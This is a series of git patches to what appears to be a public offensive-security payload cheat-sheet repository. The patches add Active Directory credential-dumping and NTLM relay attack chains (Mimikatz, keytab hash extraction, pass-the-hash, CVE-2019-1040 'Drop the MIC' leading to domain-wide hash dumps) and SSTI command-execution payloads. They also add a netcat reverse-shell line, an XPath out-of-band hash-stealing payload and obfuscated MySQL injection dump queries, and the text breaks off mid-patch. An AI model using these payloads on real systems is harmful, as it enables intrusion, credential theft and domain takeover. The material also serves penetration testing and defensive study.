Sheriff - https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) ## Payloads with localhost From ed252df92e25bea32e62b950fc5f97b72478ddb2 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Oct 2019 13:25:06 +0200 Subject: [PATCH 072/222] krb5.keytab + credential use summary --- .../Active Directory Attack.md | 39 +++++++++- .../Windows - Mimikatz.md | 5 ++ .../Windows - Using credentials.md | 76 +++++++++++++------ Server Side Template Injection/README.md | 1 + 4 files changed, 97 insertions(+), 24 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index af91b3fa..3140024c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -13,6 +13,7 @@ * Using vssadmin * Using DiskShadow * Using Mimikatz DCSync + * Using Mimikatz sekurlsa * [Password in AD User comment](#password-in-ad-user-comment) * [Pass-the-Ticket Golden Tickets](#pass-the-ticket-golden-tickets) * [Pass-the-Ticket Silver Tickets](#pass-the-ticket-silver-tickets) @@ -28,6 +29,7 @@ * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) * [PrivExchange attack](#privexchange-attack) * [Password spraying](#password-spraying) + * [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab) * [PXE Boot image attack](#pxe-boot-image-attack) ## Tools @@ -393,6 +395,15 @@ mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. +#### Using Mimikatz sekurlsa + +Dumps credential data in an Active Directory domain when run on a Domain Controller. +:warning: Requires administrator access with debug or Local SYSTEM rights + +```powershell +sekurlsa::krbtgt +lsadump::lsa /inject /name:krbtgt +``` ### Password in AD User comment @@ -902,6 +913,30 @@ Most of the time the best passwords to spray are : - Welcome1 - $Companyname1 +### Extract accounts from /etc/krb5.keytab + +The service keys used by services that run as root are usually stored in the keytab file /etc/krb5.keytab. This service key is the equivalent of the service's password, and must be kept secure. + +Use [`klist`](https://adoptopenjdk.net/?variant=openjdk13&jvmVariant=hotspot) to read the keytab file and parse its content. The key that you see when the [key type](https://cwiki.apache.org/confluence/display/DIRxPMGT/Kerberos+EncryptionKey) is 23 is the actual NT Hash of the user. + +```powershell +$ klist.exe -t -K -e -k FILE:C:\Users\User\downloads\krb5.keytab +[...] +[26] Service principal: host/COMPUTER@DOMAIN + KVNO: 25 + Key type: 23 + Key: 6b3723410a3c54692e400a5862256e0a + Time stamp: Oct 07, 2019 09:12:02 +[...] +``` + +Connect to the machine using the account and the hash with CME. + +```powershell +$ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "6b3723410a3c54692e400a5862256e0a" -d "DOMAIN" +CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c54692e400a5862256e0a +``` + ### PXE Boot image attack @@ -1005,4 +1040,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) -* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) \ No newline at end of file +* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) +* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 9e1f8696..6e28b25f 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -24,6 +24,10 @@ mimikatz # sekurlsa::wdigest ```powershell mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest + +# to re-enable wdigest in Windows Server 2012+ +# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest +# create a DWORD 'UseLogonCredential' with the value 1. ``` ## Mimikatz - Mini Dump @@ -108,3 +112,4 @@ More informations can be grabbed from the Memory with : - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) +- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 17f22cf5..67b3823c 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -1,6 +1,25 @@ # Windows - Using credentials -## TIP 1 - Create your credential :D +## Summary + +* [TIPS](#tips) + * [TIP 1 - Create your credential](#tip-1-create-your-credential) + * [TIP 2 - Retail Credential](#tip-2-retail-credential) + * [TIP 3 - Sandbox Credential - WDAGUtilityAccount](#tip-3-sandbox-credrential-wdagutilityaccount) +* [Metasploit](#metasploit) + * [Metasploit - SMB](#metasploit-smb) + * [Metasploit - Psexec](#metasploit-psexec) +* [Crackmapexec](#crackmapexec) +* [Winexe](#winexe) +* [Psexec.py / Smbexec.py / Wmiexec.py](#psexec.py---smbexec.py---wmiexec.py) +* [PsExec - Sysinternal](#psexec-sysinternal) +* [RDP Remote Desktop Protocol](#rdp-remote-desktop-protocol) +* [Netuse](#netuse) +* [Runas](#runas) + +## TIPS + +### TIP 1 - Create your credential ```powershell net user hacker hacker1234* /add @@ -17,7 +36,9 @@ net user /dom net user /domain ``` -## TIP 2 - Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) +### TIP 2 - Retail Credential + +Retail Credential [@m8urnett on Twitter](https://twitter.com/m8urnett/status/1003835660380172289) when you run Windows in retail demo mode, it creates a user named Darrin DeYoung and an admin RetailAdmin @@ -26,7 +47,9 @@ Username: RetailAdmin Password: trs10 ``` -## TIP - Sandbox Credential - WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) +### TIP 3 - Sandbox Credential - WDAGUtilityAccount + +WDAGUtilityAccount - [@never_released on Twitter](https://twitter.com/never_released/status/1081569133844676608) Starting with Windows 10 version 1709 (Fall Creators Update), it is part of Windows Defender Application Guard @@ -37,7 +60,9 @@ Password: pw123 ``` -## Metasploit - SMB +## Metasploit + +### Metasploit - SMB ```c use auxiliary/scanner/smb/smb_login @@ -49,7 +74,7 @@ run creds ``` -## Metasploit - Psexec +### Metasploit - Psexec Note: the password can be replaced by a hash to execute a `pass the hash` attack. @@ -63,27 +88,27 @@ run shell ``` -## Crackmapexec (Integrated to Kali) +## Crackmapexec ```python git clone https://github.com/byt3bl33d3r/CrackMapExec.github python crackmapexec.py 10.9.122.0/25 -d DOMAIN -u username -p password python crackmapexec.py 10.10.10.10 -d DOMAIN -u username -p password -x whoami -``` - -## Crackmapexec (Pass The Hash) - -```powershell +# pass the hash cme smb 172.16.157.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:5509de4ff0a6eed7048d9f4a61100e51' --local-auth ``` -## Winexe (Integrated to Kali) +## Winexe + +Integrated to Kali ```python winexe -U DOMAIN/username%password //10.10.10.10 cmd.exe ``` -## Psexec.py / Smbexec.py / Wmiexec.py (Impacket) +## Psexec.py / Smbexec.py / Wmiexec.py + +from Impacket ```python git clone https://github.com/CoreSecurity/impacket.git @@ -95,7 +120,16 @@ python wmiexec.py DOMAIN/username:password@10.10.10.10 # switch admin user to NT Authority/System ``` -## RDP Remote Desktop Protocol (Impacket) +## PsExec - Sysinternal + +from Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) + +```powershell +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe +PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +``` + +## RDP Remote Desktop Protocol ```powershell python rdpcheck.py DOMAIN/username:password@10.10.10.10 @@ -139,24 +173,20 @@ xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 ``` -## Netuse (Windows) +## Netuse + +Windows only ```powershell net use \\ordws01.cscou.lab /user:DOMAIN\username password C$ ``` -## Runas (Windows - Kerberos auth) +## Runas ```powershell runas /netonly /user:DOMAIN\username "cmd.exe" -``` - -## PsExec (Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) ) - -```powershell -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -PsExec.exe \\ordws01.cscou.lab -u DOMAIN\username -p password cmd.exe -s # get System shell +runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` ## References diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 1ac3ac95..71aa5ad8 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -288,6 +288,7 @@ nv -lnvp 8000 ```python {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}} +{{config.__class__.__init__.__globals__['os'].popen('ls').read()}} ``` #### Exploit the SSTI by calling Popen without guessing the offset From b54142c3a29410a7ee19130f80b1b7c6f07a7b85 Mon Sep 17 00:00:00 2001 From: Hi15358 Date: Mon, 21 Oct 2019 02:35:13 +0800 Subject: [PATCH 073/222] Update Reverse Shell Cheatsheet.md --- Methodology and Resources/Reverse Shell Cheatsheet.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 57e24be4..cf91cc25 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -129,6 +129,7 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp"," ```bash nc -e /bin/sh [IPADDR] [PORT] nc.traditional -e /bin/bash 10.0.0.1 4444 +nc -c bash 10.0.0.1 4444 ``` ### Netcat OpenBsd From 11fc6e4bc5c283a3b0bf0517d7a72f63956d1e41 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 20 Oct 2019 22:09:36 +0200 Subject: [PATCH 074/222] NTLM relay + MS08-068 --- .../Active Directory Attack.md | 57 ++++++++++++++++++- 1 file changed, 55 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3140024c..7685d9c9 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -23,6 +23,8 @@ * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) + * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) + * [SMB Signing Disabled](#smb-signing-disabled) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) @@ -658,12 +660,62 @@ hashcat -m 5600 -a 0 hash.txt crackstation.txt ### NTLMv2 hashes relaying +NTLMv1 and NTLMv2 can be relayed to connect to another machine. + +| Hash | Hashcat | Attack method | +|---|---|---| +| LM | 3000 | crack/pass the hash | +| NTLM/NTHash | 1000 | crack/pass the hash | +| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack | +| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack | + +#### MS08-068 NTLM reflection + +NTLM reflection vulnerability in the SMB protocolOnly targeting Windows 2000 to Windows Server 2008. + +> This vulnerability allows an attacker to redirect an incoming SMB connection back to the machine it came from and then access the victim machine using the victim’s own credentials. + +* https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS08-068 + +```powershell +msf > use exploit/windows/smb/smb_relay +msf exploit(smb_relay) > show targets +``` + +#### SMB Signing Disabled + If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine. 1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`. + ```powershell + [Responder Core] + ; Servers to start + ... + SMB = Off # Turn this off + HTTP = Off # Turn this off + ``` 2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`. 3. Run `python Responder.py -I ` and `python MultiRelay.py -t -u ALL` -4. Wait for a shell +4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. + ```powershell + ntlmrelayx.py -tf targets.txt + ``` +5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions. + ```powershell + $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support + [*] Servers started, waiting for connections + Type help for list of commands + ntlmrelayx> socks + Protocol Target Username Port + -------- -------------- ------------------------ ---- + MSSQL 192.168.48.230 VULNERABLE/ADMINISTRATOR 1433 + SMB 192.168.48.230 CONTOSO/NORMALUSER1 445 + MSSQL 192.168.48.230 CONTOSO/NORMALUSER1 1433 + + $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1 + $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth + ``` + ### Dangerous Built-in Groups Usage @@ -1042,4 +1094,5 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) -* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) \ No newline at end of file +* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file From 727eb5cabd2bf265813f0d0376912dc3c86c3acb Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 21 Oct 2019 23:00:27 +0200 Subject: [PATCH 075/222] Drop the MIC --- .../Active Directory Attack.md | 36 ++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7685d9c9..51d7003a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -25,6 +25,7 @@ * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) * [SMB Signing Disabled](#smb-signing-disabled) + * [Drop the MIC](#drop-the-mic) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) * [Unconstrained delegation](#unconstrained-delegation) @@ -716,6 +717,37 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth ``` +#### Drop the MIC + +> The CVE-2019-1040 vulnerability makes it possible to modify the NTLM authentication packets without invalidating the authentication, and thus enabling an attacker to remove the flags which would prevent relaying from SMB to LDAP + +Check vulnerability with [cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner) + +```powershell +python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET' +[*] CVE-2019-1040 scanner by @_dirkjan / Fox-IT - Based on impacket by SecureAuth +[*] Target TARGET is not vulnerable to CVE-2019-1040 (authentication was rejected) +``` + +- Using any AD account, connect over SMB to a victim Exchange server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant DCSync privileges to the attacker account. The attacker account can now use DCSync to dump all password hashes in AD + ```powershell + TERM1> python printerbug.py testsegment.local/testuser@s2012exc.testsegment.local + TERM2> ntlmrelayx.py --remove-mic --escalate-user ntu -t ldap://s2016dc.testsegment.local -smb2support + TERM1> secretsdump.py testsegment/ntu@s2016dc.testsegment.local -just-dc + ``` + + +- Using any AD account, connect over SMB to the victim server, and trigger the SpoolService bug. The attacker server will connect back to you over SMB, which can be relayed with a modified version of ntlmrelayx to LDAP. Using the relayed LDAP authentication, grant Resource Based Constrained Delegation privileges for the victim server to a computer account under the control of the attacker. The attacker can now authenticate as any user on the victim server. + ```powershell + # create a new machine account + TERM1> ntlmrelayx.py -t ldaps://rlt-dc.relaytest.local --remove-mic --delegate-access -smb2support + TERM2> python printerbug.py relaytest.local/testuser@second-dc-server 10.0.2.6 + TERM1> getST.py -spn host/second-dc-server.local 'relaytest.local/MACHINE$:PASSWORD' -impersonate DOMAIN_ADMIN_USER_NAME + + # connect using the ticket + export KRB5CCNAME=DOMAIN_ADMIN_USER_NAME.ccache + secretsdump.py -k -no-pass second-dc-server.local -just-dc + ``` ### Dangerous Built-in Groups Usage @@ -1095,4 +1127,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys * [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) * [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) * [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) -* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) \ No newline at end of file +* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) +* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) +* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) \ No newline at end of file From c6b5bbab2b577d3a488abd451bd23cc858ce5b73 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 22 Oct 2019 20:26:04 +0200 Subject: [PATCH 076/222] fix TOC links --- Server Side Request Forgery/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 46070c93..b9c47aca 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -8,17 +8,17 @@ * [Payloads with localhost](#payloads-with-localhost) * [Bypassing filters](#bypassing-filters) * [Bypass using HTTPS](#bypass-using-https) - * [Bypass localhost with [::]](#bypass-localhost-with----) + * [Bypass localhost with [::]](#bypass-localhost-with-) * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection) * [Bypass localhost with CIDR](#bypass-localhost-with-cidr) * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location) - * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6-ipv4-address-embedding) + * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding) * [Bypass using malformed urls](#bypass-using-malformed-urls) * [Bypass using rare address](#bypass-using-rare-address) * [Bypass using bash variables](#bypass-using-bash-variables) * [Bypass using tricks combination](#bypass-using-tricks-combination) * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) - * [Bypass filter_var() php function](#bypass-filter-var-php-function) + * [Bypass filter_var() php function](#bypass-filter_var-php-function) * [Bypass against a weak parser](#bypass-against-a-weak-parser) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [file://](#file) @@ -668,4 +668,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) -- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) \ No newline at end of file +- [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) From 88f020381ddcefc96a3fb9125fa398b6f74ba76a Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 22 Oct 2019 23:06:35 +0200 Subject: [PATCH 077/222] Out of band XPATH --- XPATH Injection/README.md | 27 +++++++++++++++++++++------ 1 file changed, 21 insertions(+), 6 deletions(-) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md index 4b2eddc4..12bb05e4 100644 --- a/XPATH Injection/README.md +++ b/XPATH Injection/README.md @@ -1,6 +1,13 @@ # XPATH injection -XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. +> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. + +## Summary + +* [Exploitation](#exploitation) +* [Blind exploitation](#blind-exploitation) +* [Out Of Band Exploitation](#out-of-band-exploitation) +* [References](#references) ## Exploitation @@ -24,16 +31,24 @@ x' or name()='username' or 'x'='y ## Blind Exploitation -```sql 1. Size of a string -and string-length(account)=SIZE_INT - + ```sql + and string-length(account)=SIZE_INT + ``` 2. Extract a character -substring(//user[userid=5]/username,2,1)=CHAR_HERE -substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ```sql + substring(//user[userid=5]/username,2,1)=CHAR_HERE + substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) + ``` + +## Out Of Band Exploitation + +```powershell +http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') ``` ## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) +* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) From 5b59da70f7dfe4b091c2b33d9d97ab74b9f0bdeb Mon Sep 17 00:00:00 2001 From: nizam0906 Date: Fri, 25 Oct 2019 18:11:11 +0530 Subject: [PATCH 078/222] Update MySQL Injection.md Added 6 MYSQL DIOS * Zen * Zen WAF * ~tr0jAn WAF * ~tr0jAn Benchmark * N1Z4M * sharik --- SQL Injection/MySQL Injection.md | 20 +++++++++++++++++++- 1 file changed, 19 insertions(+), 1 deletion(-) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 6574bb05..f61cc52b 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -266,6 +266,24 @@ make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(51 -- M@dBl00d (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)) + +-- Zen ++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) + +-- Zen WAF +(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a) + +-- ~tr0jAn WAF ++concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3c63656e7465723e3c666f6e7420636f6c6f723d7265642073697a653d343e3c623e3a3a207e7472306a416e2a2044756d7020496e204f6e652053686f74205175657279203c666f6e7420636f6c6f723d626c75653e28574146204279706173736564203a2d20207620312e30293c2f666f6e743e203c2f666f6e743e3c2f63656e7465723e3c2f623e))),0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e4d7953514c2056657273696f6e203a3a20,version(),0x7e20,@@version_comment,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0) from(information_schema./**/columns)where(table_schema=database()) and(0x00)in(@x:=Concat/*!(@x, 0x3c62723e, if( (@tbl!=table_name), Concat/*!(0x3c666f6e7420636f6c6f723d707572706c652073697a653d333e,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1, 2, 0x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203c666f6e7420636f6c6f723d677265656e3e3a3a204461746162617365203a3a203c666f6e7420636f6c6f723d626c61636b3e28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e), 0x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/+ + +-- ~tr0jAn Benchmark ++concat(0x3c666f6e7420636f6c6f723d7265643e3c62723e3c62723e7e7472306a416e2a203a3a3c666f6e7420636f6c6f723d626c75653e20,version(),0x3c62723e546f74616c204e756d626572204f6620446174616261736573203a3a20,(select count(*) from information_schema.schemata),0x3c2f666f6e743e3c2f666f6e743e,0x202d2d203a2d20,concat(@sc:=0x00,@scc:=0x00,@r:=0,benchmark(@a:=(select count(*) from information_schema.schemata),@scc:=concat(@scc,0x3c62723e3c62723e,0x3c666f6e7420636f6c6f723d7265643e,LPAD(@r:=@r%2b1,3,0x30),0x2e20,(Select concat(0x3c623e,@sc:=schema_name,0x3c2f623e) from information_schema.schemata where schema_name>@sc order by schema_name limit 1),0x202028204e756d626572204f66205461626c657320496e204461746162617365203a3a20,(select count(*) from information_Schema.tables where table_schema=@sc),0x29,0x3c2f666f6e743e,0x202e2e2e20 ,@t:=0x00,@tt:=0x00,@tr:=0,benchmark((select count(*) from information_Schema.tables where table_schema=@sc),@tt:=concat(@tt,0x3c62723e,0x3c666f6e7420636f6c6f723d677265656e3e,LPAD(@tr:=@tr%2b1,3,0x30),0x2e20,(select concat(0x3c623e,@t:=table_name,0x3c2f623e) from information_Schema.tables where table_schema=@sc and table_name>@t order by table_name limit 1),0x203a20284e756d626572204f6620436f6c756d6e7320496e207461626c65203a3a20,(select count(*) from information_Schema.columns where table_name=@t),0x29,0x3c2f666f6e743e,0x202d2d3a20,@c:=0x00,@cc:=0x00,@cr:=0,benchmark((Select count(*) from information_schema.columns where table_schema=@sc and table_name=@t),@cc:=concat(@cc,0x3c62723e,0x3c666f6e7420636f6c6f723d707572706c653e,LPAD(@cr:=@cr%2b1,3,0x30),0x2e20,(Select (@c:=column_name) from information_schema.columns where table_schema=@sc and table_name=@t and column_name>@c order by column_name LIMIT 1),0x3c2f666f6e743e)),@cc,0x3c62723e)),@tt)),@scc),0x3c62723e3c62723e,0x3c62723e3c62723e)+ + +-- N1Z4M WAF 